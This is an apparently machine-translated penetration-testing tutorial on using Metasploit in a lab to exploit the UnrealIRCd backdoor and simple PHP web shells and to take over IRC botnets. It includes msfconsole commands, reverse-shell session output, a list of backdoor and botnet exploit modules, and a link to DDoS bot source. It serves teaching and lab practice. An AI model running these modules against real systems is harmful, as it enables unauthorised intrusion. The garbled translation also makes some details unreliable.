Technology disclosure: How hackers use Metasploit to take over backdoor and botnet?

Source: Internet
Author: User
Tags ad server perl script kali linux
There are many exploits in the Metasploit framework, including buffer overflows, browser exploits, Web application vulnerabilities, backdoor exploits, zombie takeover tools, and more. Exploit developers and people who have contributed to this framework have shared a lot of interesting and useful things.

In this article, we will discuss the use of Metasploit to attack and take over common backdoor and botnet topics. We won't delve into all the modules, but we'll mention some of the modules that will be used in future penetration testing or work. We do not develop exploit, so you do not need to use the debugger and the Code editor.

If you're just beginning to use Msfconsole (a command-line interface of the framework) to work with the Metasploit framework, don't worry, here's a step-by-step way to teach you how to use the exploit module. This tutorial only requires you to do one thing, install Metasploit on your attack aircraft, I recommend that you use Kali Linux or Backbox, which is a release system for penetration testing, has pre-installed Metasploit.

For our target machine, I suggest you install metasploitable 2 on your favorite virtualization platform, such as VMware or VirtualBox. Metasploitable 2 is a vulnerable Ubuntun Linux virtual machine that you can use to practice your Metasploit, because it has some unsafe programs installed on it.

The Metasploitable 2 virtual machine configuration installs services that contain backdoor and public vulnerabilities.

On port 6667, metasploitable 2 runs a backdoor unreaircd IRC daemon that can be triggered by sending the letter "AB", allowing an attacker to execute arbitrary system commands with user rights to run IRCD. This is a very good exploit to practice, so let's try to get a shell to pop up. Fortunately, Metasploit already has an exploit module for the vulnerability, located below Exploit/unix/irc/unreal_ircd_3281_backdoor.

Enter Msfconsole to open the Metasploit command line interface. Enter Info Exploit/unix/irc/unreal_ircd_3281_backdoor to see the description of the module: "This module exploits a vulnerability to attack an unreal ircd 3.2.8.1 download package with a malicious backdoor attached. The backdoor is located in the unreal3.2.8.1.tar.gz compression package for the period from November 2009 to June 12, 2010 "

Now it's time to attack the service that contains the back door!

Wow, we got the shell. For more information on other back-door services, please see the metasploitable 2 exploitability guide.

Shouldn't we be talking about the usual backdoor and zombie network takeover topic? Yes! We're just getting started, and we've just made a simple and brief introduction of how to use the MSF console to attack the backdoor in the UNREAIRCD IRC service.

Our goal is to introduce a novelty, Metasploit already has this type of module, which does not remotely execute arbitrary code on Web applications or buffer overflow attacks on applications or services.

In the next example, we will use a simple backdoor Shell Remote Code execution Module I wrote to attack a web backdoor. This module attacks a simple Web backdoor that takes advantage of the vulnerable point parameters of the common backdoor shell to execute commands.

Daniel Miessler and Jason Haddix's owasp Safe List project has many examples of these backdoor shells, which are categorized under payloads.

Before we explore the simple backdoor shell Remote Code execution module, we first create a backdoor shell on the target machine. I recommend that you install an Apache server on a Linux virtual machine and write the following vulnerable code:

I put this code under the/var/www/html/msfdev/vulnerable.php path of the Ubuntun VM virtual machine so that I can access it using a browser http://localhost/msfdev/vulnerable.php , as shown, the POC using this vulnerability code can execute arbitrary commands via the exec parameter.

Now we use the simple backdoor Shell Remote Code execution module.

As you can see after executing the show option command output information, there are some options that must be set (in addition to Rhost,rport, and other common options), by setting method to specify the HTTP method, by setting the TargetUri to specify the path of the backdoor shell, and by setting Var to specify parameters or to say command variables.

Assuming the IP address of our target machine is 192.168.150.136, we need to set Rhost to this address and define the location of our backdoor shell by setting TargetUri to/msfdev/vulnerable.php. Then there is the VAR option, which we can set to exec so that arbitrary commands can be executed. We do not need to set the HTTP method because the Web application allows the Get method, and the Get method can exploit it.

MSF exploit (simple_backdoors_exec) > Set rhost 192.168.150.136rhost = 192.168.150.136msf Exploit (simple_ BACKDOORS_EXEC) > Set var Execvar = execmsf Exploit (simple_backdoors_exec) > Set TARGETURI/MSFDEV/VULNERABLE.P Hptageturi =/msfdev/vulnerable.phpmsf Exploit (simple_backdoors_exec) >exploit[*] Started reverse Double Handler[*] Accepted The first client connection ... [*] Accepted The second client connection ... [*] Command:echo We5lyqtbehiwwfd4; [*] Writing to sockets a[*] Writing to sockets b[*] Reading from sockets ... [*] Reading from Socket a[*] A: "we5lyqtbehiwwfd4\r\n" [*] Matching ... [*] B is input ... [*] Command Shell Session 1 opened (192.168.150.129:4444-192.168.150.136:49484) at 2016-02-22 09:24:57-0500

Successfully popped a second shell! Well, that's the whole process of attacking the Web shell with this module.

The following are some other exploit modules related to this type of module:

Th3 MMA mma.php Backdoor arbitrary file upload– This module attacks Th3 MMA mma.php backdoor, can upload arbitrary files, which leads to arbitrary code execution. Because of the php_uname () function, the backdoor also echoes the Linux kernel version number or the operating system version number.

Zemra Botnet CNC web Panel Remote code execution– This module attacks the CNC Web panel of the Zemra botnet, including a backdoor in its leaked source code. Zemra is a malicious software that can implement a DDoS attack that is discovered by Symantec and named Backdoor.zemra.

China Chopper Caidao PHP Backdoor Code execution– This module attacks a Chinese hacker widely used in Chinese chopper Webshell.

Horde 3.3.12 Backdoor arbitrary PHP code execution– This module attacks a horde 3.3.12 and horde Groupware 1.2.10 that contains the backdoor of any PHP code execution vulnerability.

OpenX Backdoor PHP Code execution– at least from November 2012 to August 2013, a hidden backdoor was installed on the Penx Ad Server version 2.8.10. Exploits are very simple and only need to send a separate request with ROT13 ' d and back-to-connect loads.

Stunshell Web Shell Remote PHP Code execution– This module attacks an unconfirmed version of a "Stunshell" Webshell. This module works when Safe mode is turned on on the Web server. The shell is widely used in automated RFI loads.

Continue, the list will grow longer. With the command search backdoor you can get more modules.

Another type of module I wrote and contributed to was taken over by the botnet. A good example is the W3tw0rk/pitbul IRC Bot Remote Code execution. This module attacks a W3TW0RK botnet, registers your nickname or pretends to be an administrator or caretaker of an IRC channel that registers a botnet.

I want to take this as a challenge for you, so I won't explain what these options mean and how to attack such botnets, and already have a screenshot of this exploit. I think you've seen the pattern of setting Metasploit by the previous instructions.

Here is the source code script for W3tw0rk/pitbul IRC, which can be used to launch a DDoS (distributed denial of service) or DOS (denial of service) attack:

Https://github.com/shipcod3/IRC-Bot-Hunters/blob/master/malicious_samples/w3tw0rk.txt. You should run it in your virtual machine to make sure it is connected to your own IRC server so that your virtual machine will not be controlled by other botnet keepers or malware crusaders.

Most of the botnet exploit modules I wrote were inspired by the PHP IRC Bot pbot eval () Remote Code execution module, which is the first IRC botnet exploit in Metasploit. According to its description, "This module can be executed remotely on the PHP IRC bot Pbot because of the misuse of the eval () function when implementing the. PHP command. The module was successfully tested on the Pbot version of Jay Turla analysis, published in InfoSec Institue, and runs on Ubuntu 10.04 and Windows XP SP3. ”

I am not responsible for the damage caused by this script, but please use it for instructional purposes only.

Other exploit modules related to botnet takeover:

Xdh/linuxnet perlbot/fbot IRC bot remote Code execution– This module can be executed remotely on an IRC bot developed by XDH. This Perl Bot was captured by Conor Patrick with his Shellshock honeypot server, and Markus Zanke it into the Fbot (Fire & Forget–ddos Bot) category. Matt Thayer found this script to have a linuxnet perlbot description. This bot only answers the service name and nickname configured in the Perl script, so in order to attack the bot you need to be able to manipulate the IRC network to trick it or at least have the same IP as the configuration.

Ra1nx PHP bot pubcall Authentication Bypass remote Code execution– This module can be executed remotely on PHP IRC bot ra1nx, by using public call in private information Feature to secretly bypass the authentication system.

Legend perl IRC bot remote Code execution– This module can be executed remotely on the Legend perl IRC bot. October 2014 the bot was used as a payload in the Shellshock spam. This special bot has some features such as Nmap Scan, TCP, HTTP, SQL, and UDP flood attacks, clear system logs, get root privileges, VNC scan. Kevin Stevens, a senior threat research expert at Damballa, uploaded the script to VirusTotal, whose MD5 was 11a9f1589472efa719827079c3d13f76.

Dexter (casinoloader) SQL injection– This module attacks a vulnerability found in commands and control panels that are used on control Dexter. Exploit is achieved by accessing a PHP page (gateway.php) used by bots, which does not protect the input. The input is encrypted and encoded. The command and Control Panel specifies the location of an uploaded file, which can be used as a reliable location for writing to the PHP shell. Authentication is not required to exploit this vulnerability.

Reference documents:

https://community.rapid7.com/docs/DOC-1875

https://forums.unrealircd.org/viewtopic.php?t=6562

https://github.com/rapid7/metasploit-framework/

* Original: Infosecinstitute Felix compiled, reproduced please specify from Freebuf hack and Geek (freebuf.com)

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.